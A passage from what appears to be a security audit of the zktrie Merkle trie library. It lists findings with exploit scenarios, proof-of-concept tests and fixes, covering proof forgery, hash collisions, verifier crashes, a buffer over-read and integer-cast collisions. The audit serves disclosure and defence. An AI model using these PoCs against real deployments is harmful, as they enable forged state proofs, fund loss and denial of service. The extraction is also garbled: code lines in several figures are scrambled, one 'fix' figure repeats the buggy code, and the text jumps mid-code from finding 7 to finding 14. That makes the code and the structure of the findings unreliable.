k1.Hash() } zkt.NewHashFromBigInt(k2_hash)[:])[0] { for k1 == k2 || !getPath(1, for i := len(k2); i > 0; i -= 1 { k2[i-1] += 1 if k2[i-1] != 0 { break } } k2_hash, _ = k2.Hash() } return k1, k2 })() k1_hash_int, _ := k1.Hash() k2_hash_int, _ := k2.Hash() k1_hash := zkt.NewHashFromBigInt(k1_hash_int) k2_hash := zkt.NewHashFromBigInt(k2_hash_int) // create a dummy value for k2, and use that to craft a // malicious value for k1 k2_value := (&[2]zkt.Byte32{{2}})[:] k1_value, _ := NewLeafNode(k2_hash, 1, k2_value).NodeHash() []zkt.Byte32{*zkt.NewByte32FromBytes(k1_value.Bytes())} k1_value_array := // insert k1 into the trie with the malicious value assert.Nil(t, zkTrie.TryUpdate(zkt.NewHashFromBigInt(k1_hash_int), 0, k1_value_array)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } // query an inclusion proof for k1 k1Proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k1_hash_int, 10, getNode) assert.Nil(t, err) assert.True(t, k1Proof.Existence) // check that inclusion proof against our root hash k1_val_hash, _ := NewLeafNode(k1_hash, 0, k1_value_array).NodeHash() k1Proof_root, _ := k1Proof.Verify(k1_val_hash, k1_hash) assert.Equal(t, k1Proof_root, zkTrie.rootHash) // forge a non-existence proof fakeNonExistProof := *k1Proof fakeNonExistProof.Existence = false // The new non-existence proof needs one extra level, where // the sibling hash is H(1,k1_hash) fakeNonExistProof.depth += 1 zkt.SetBitBigEndian(fakeNonExistProof.notempties[:], fakeNonExistProof.depth-1) fakeSibHash, _ := zkt.HashElems(big.NewInt(1), k1_hash_int) fakeNonExistProof.Siblings = append(fakeNonExistProof.Siblings, fakeSibHash) // Construct the NodeAux details for the malicious leaf k2_value_hash, _ := zkt.PreHandlingElems(1, k2_value) k2_nodekey := zkt.NewHashFromBigInt(k2_hash_int) fakeNonExistProof.NodeAux = &NodeAux{Key: k2_nodekey, Value: k2_value_hash} // Check our non-existence proof against the root hash fakeNonExistProof_root, _ := fakeNonExistProof.Verify(k1_val_hash, assert.Equal(t, fakeNonExistProof_root, zkTrie.rootHash) // fakeNonExistProof and k1Proof prove opposite things. k1 // is both in and not-in the tree! assert.NotEqual(t, fakeNonExistProof.Existence, k1Proof.Existence) k1_hash) }) } Figure 1.2: A proof-of-concept test case for proof forgery Exploit Scenario Suppose Alice uses the zktrie to implement the Ethereum account table in a zkEVM-based bridge with trustless state updates. Bob submits a transaction that inserts specially crafted account data into some position in that tree. At a later time, Bob submits a transaction that depends on the result of an account table lookup. Bob generates two contradictory Merkle proofs and uses those proofs to create two zkEVM execution proofs that step to different final states. By submitting one proof each to the opposite sides of the bridge, Bob causes state divergence and a loss of funds. Recommendations Short term, modify NodeHash to domain-separate leaves and branches, such as by changing the branch hash to zkt.HashElems(big.NewInt(2),n.ChildL.BigInt(), n.ChildR.BigInt()). Long term, fully document all data structure designs and requirements, and review all assumptions to ensure that they are well founded. +2. Lack of proof validation causes denial of service on the verifier Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-ZKTRIE-2 Target: trie/zk_trie_impl.go Description The Merkle tree proof verifier assumes several well-formedness properties about the received proof and node arguments. If at least one of these properties is violated, the verifier will have a runtime error. The first property that must hold is that the node associated with the Merkle proof must be a leaf node (i.e., must contain a non-nil NodeKey field). If this is not the case, computing the rootFromProof for a nil NodeKey will cause a panic when computing the getPath function. Secondly, the Proof fields must be guaranteed to be consistent with the other fields. Assuming that the proof depth is correct will cause out-of-bounds accesses to both the NodeKey and the notempties field. Finally, the Siblings array length should also be validated; for example, the VerifyProofZkTrie will panic due to an out-of-bounds access if the proof.Siblings field is empty (highlighted in yellow in the rootFromProof function). // VerifyProof verifies the Merkle Proof for the entry and root. func VerifyProofZkTrie(rootHash *zkt.Hash, proof *Proof, node *Node) bool { nodeHash, err := node.NodeHash() if err != nil { return false } rootFromProof, err := proof.Verify(nodeHash, node.NodeKey) if err != nil { return false } return bytes.Equal(rootHash[:], rootFromProof[:]) } // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } func (proof *Proof) rootFromProof(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { var err error sibIdx := len(proof.Siblings) - 1 path := getPath(int(proof.depth), nodeKey[:]) var siblingHash *zkt.Hash for lvl := int(proof.depth) - 1; lvl >= 0; lvl-- { if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) { siblingHash = proof.Siblings[sibIdx] sibIdx-- } else { siblingHash = &zkt.HashZero } if path[lvl] { nodeHash, err = NewParentNode(siblingHash, nodeHash).NodeHash() if err != nil { return nil, err } } else { nodeHash, err = NewParentNode(nodeHash, siblingHash).NodeHash() if err != nil { return nil, err } } } return nodeHash, nil } Figure 2.1: zktrie/trie/zk_trie_impl.go#595– Exploit Scenario An attacker crafts an invalid proof that causes the proof verifier to crash, causing a denial of service in the system. Recommendations Short term, validate the proof structure before attempting to use its values. Add fuzz testing to the VerifyProofZkTrie function. Long term, add extensive tests and fuzz testing to functions interfacing with attacker-controlled values. +3. Two incompatible ways to generate proofs Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-ZKTRIE-3 Target: trie/{zk_trie.go, zk_trie_impl.go} Description There are two incompatible ways to generate proofs. The first implementation (figure 3.1) writes to a given callback, effectively returning []bytes. It does not have a companion verification function; it has only positive tests (zktrie/trie/zk_trie_test.go#L93-L125); and it is accessible from the C function TrieProve and the Rust function prove. The second implementation (figure 3.2) returns a pointer to a Proof struct. It has a companion verification function (zktrie/trie/zk_trie_impl.go#L595-L632); it has positive and negative tests (zktrie/trie/zk_trie_impl_test.go#L484-L537); and it is not accessible from C or Rust. // Prove is a simlified calling of ProveWithDeletion func (t *ZkTrie) Prove(key []byte, fromLevel uint, writeNode func(*Node) error) error { return t.ProveWithDeletion(key, fromLevel, writeNode, nil) } // ProveWithDeletion constructs a merkle proof for key. The result contains all encoded nodes // on the path to the value at key. The value itself is also included in the last // node and can be retrieved by verifying the proof. // // If the trie does not contain a value for key, the returned proof contains all // nodes of the longest existing prefix of the key (at least the root node), ending // with the node that proves the absence of the key. // // If the trie contain value for key, the onHit is called BEFORE writeNode being called, // both the hitted leaf node and its sibling node is provided as arguments so caller // would receive enough information for launch a deletion and calculate the new root // base on the proof data // Also notice the sibling can be nil if the trie has only one leaf func (t *ZkTrie) ProveWithDeletion(key []byte, fromLevel uint, writeNode func(*Node) error, onHit func(*Node, *Node)) error { [...] } Figure 3.1: The first way to generate proofs (zktrie/trie/zk_trie.go#143–164) // Proof defines the required elements for a MT proof of existence or // non-existence. type Proof struct { // existence indicates wether this is a proof of existence or // non-existence. Existence bool // depth indicates how deep in the tree the proof goes. depth uint // notempties is a bitmap of non-empty Siblings found in Siblings. notempties [zkt.HashByteLen - proofFlagsLen]byte // Siblings is a list of non-empty sibling node hashes. Siblings []*zkt.Hash // NodeAux contains the auxiliary information of the lowest common ancestor // node in a non-existence proof. NodeAux *NodeAux } // BuildZkTrieProof prove uniformed way to turn some data collections into Proof struct func BuildZkTrieProof(rootHash *zkt.Hash, k *big.Int, lvl int, getNode func(key *zkt.Hash) (*Node, error)) (*Proof, *Node, error) { [...] } Figure 3.2: The second way to generate proofs (zktrie/trie/zk_trie_impl.go#531–551) Recommendations Short term, decide on one implementation and remove the other implementation. Long term, ensure full test coverage in the chosen implementation; ensure the implementation has both positive and negative testing; and add fuzz testing to the proof verification routine. +4. BuildZkTrieProof does not populate NodeAux.Value Severity: Low Type: Testing Difficulty: Low Finding ID: TOB-ZKTRIE-4 Target: trie/zk_trie_impl.go Description A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2 where k != k2. In the zktrie codebase, that second case is handled by the NodeAux field in the Proof struct, as illustrated in figure 4.1. // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609–632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash fields to populate the Key and Value fields of NodeAux, as shown in figure 4.2. However, the valueHash field of this node may be nil, causing NodeAux.Value to be nil and causing proof verification to crash with a nil pointer dereference error, which can be triggered by the test case shown in figure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560–574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run("Testing for non-inclusion proofs", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in figure 4.4, fixes this problem. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the highlighted n.NodeHash() call fixes this problem. (zktrie/trie/zk_trie_impl.go#560–574) Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service. Recommendations Short term, fix BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verification, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report +5. Leaf nodes with dierent values may have the same hash Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-5 Target: trie/zk_trie_node.go, types/util.go Description The hash value of a leaf node is derived from the hash of its key and its value. A leaf node’s value comprises up to 256 32-byte fields, and that value’s hash is computed by passing those fields to the HashElems function. HashElems hashes these fields in a Merkle tree–style binary tree pattern, as shown in figure 5.1. func HashElems(fst, snd *big.Int, elems ...*big.Int) (*Hash, error) { l := len(elems) baseH, err := hashScheme([]*big.Int{fst, snd}) if err != nil { return nil, err } if l == 0 { return NewHashFromBigInt(baseH), nil } else if l == 1 { return HashElems(baseH, elems[0]) } tmp := make([]*big.Int, (l+1)/2) for i := range tmp { if (i+1)*2 > l { tmp[i] = elems[i*2] } else { h, err := hashScheme(elems[i*2 : (i+1)*2]) if err != nil { return nil, err } tmp[i] = h } } return HashElems(baseH, tmp[0], tmp[1:]...) } Figure 5.1: Binary-tree hashing in HashElems (zktrie/types/util.go#9–36) However, HashElems does not include the number of elements being hashed, so leaf nodes with different values may have the same hash, as illustrated in the proof-of-concept test case shown in figure 5.2. func TestMerkleTree_MultiValue(t *testing.T) { t.Run("Testing for value collisions", func(t *testing.T) { k := zkt.Byte32{1} k_hash_int, _ := k.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) value1 := (&[3]zkt.Byte32{{1}, {2}, {3}})[:] value1_hash, _ := NewLeafNode(k_hash, 0, value1).NodeHash() first2_hash, _ := zkt.PreHandlingElems(0, value1[:2]) value2 := (&[2]zkt.Byte32{*zkt.NewByte32FromBytes(first2_hash.Bytes()), value2_hash, _ := NewLeafNode(k_hash, 0, value2).NodeHash() assert.NotEqual(t, value1, value2) assert.NotEqual(t, value1_hash, value2_hash) {3}})[:] }) } Figure 5.2: A proof-of-concept test case for value collisions Exploit Scenario An adversary inserts a maliciously crafted value into the tree and then creates a proof for a different, colliding value. This violates the security requirements of a Merkle tree and may lead to incorrect behavior such as state divergence. Recommendations Short term, modify PrehandlingElems to prefix the ValuePreimage array with its length before being passed to HashElems. Long term, document and review all uses of hash functions to ensure that they commit to their inputs. +6. Empty UpdatePreimage function body Severity: Informational Difficulty: N/A Type: Auditing and Logging Finding ID: TOB-ZKTRIE-6 Target: trie/zk_trie_database.go Description The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or a message that is logged. This would prevent the function from being used without any warning. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 6.1: zktrie/trie/zk_trie_database.go#19 Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging. +7. CanonicalValue is not canonical Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-ZKTRIE-7 Target: trie/zk_trie_node.go Description The CanonicalValue function does not uniquely generate a representation of Node structures, allowing different Nodes with the same CanonicalValue, and two nodes with the same NodeHash but different CanonicalValues. ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187–214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55–58) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString("0000000000000000000000000000000000000000000000000000000000000000") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue // PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1<> 8 n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } … if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78–111) Recommendations Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes. Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes. +15. init_hash_scheme is not thread-safe Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-ZKTRIE-15 Target: src/lib.rs, lib.go, c.go, types/hash.go Description zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#67–69 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#65–71 InitHashScheme calls two other functions: first, a C function called init_hash_scheme and second, a second Go function (this time, in the hash module) called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in figure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29– However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#13–15 However, the only potential data race comes from multi-threaded initialization, which contradicts the usage recommendation in the README, shown in figure 15.5. We must init the crate with a poseidon hash scheme before any actions: … zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#8–24 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the “How Safe and Unsafe Interact” section of the Rustonomicon. +16. Safe-Rust ZkMemoryDb interface is not thread-safe Severity: High Difficulty: High Type: Undefined Behavior Finding ID: TOB-ZKTRIE-16 Target: lib.go,src/lib.rs,trie/zk_trie_database.go Description The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#40–43 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171–178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147–170 Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the “How Safe and Unsafe Interact” section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust’s borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl. pub fn new_trie(&mut self, root: &Hash) -> Option { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181–189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174–185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one. func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#56–72 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get(), one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve performance. Relying on Rust’s type system, they assume that thread safety has been enforced and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock(). Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the “How Safe and Unsafe Interact” section of the Rustonomicon. +17. Some Node functions return the zero hash instead of errors Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-ZKTRIE-17 Target: lib.go, trie/zk_trie_node.go Description The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149–155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160–163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values. +18. get_account can read past the buer Severity: High Difficulty: Medium Type: Data Exposure Finding ID: TOB-ZKTRIE-18 Target: lib.rs Description The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option { self.get::(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230–235) // all errors are reduced to "not found" fn get(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214–223) fn must_get_const_bytes(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect("the buf has been set to specified bytes"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100–107) #[test] fn get_account_overflow() { let storage_key = hex::decode("0000000000000000000000000000000000000000000000000000000000000000") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!("{:?}", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bits being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues. +19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-ZKTRIE-19 Target: lib.rs Description A set of unchecked integer casting operations can lead to hash collisions and runtime errors reached from the public Rust interface. The Rust library regularly needs to convert the input function’s byte array length from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number. The attacker can choose to manipulate the array and cast the value to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133–138 To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that have the same prefix and are then padded with different bytes with that length will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit. #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b648640101 00000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a8 